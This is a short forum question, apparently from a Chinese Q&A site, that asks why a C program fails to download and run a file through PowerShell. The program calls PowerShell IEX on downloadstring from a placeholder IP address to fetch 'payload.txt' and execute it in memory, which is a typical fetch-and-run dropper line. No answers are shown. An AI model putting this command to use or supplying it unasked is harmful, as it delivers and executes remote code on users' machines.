Powershell下载文件并执行C.

时间:2016-07-14 17:55:31

标签: c powershell

尝试使用PowerShell下载我在线直接链接托管的文件。这是代码。

#include<stdio.h>

main()
{
    system("powershell.exe \"IEX ((new-object net.webclient).downloadstring('http://X.X.X.X/payload.txt '))\"");
    return 0;
}

以下是我在打开的终端中获得的内容:

errors

0 个答案:

没有答案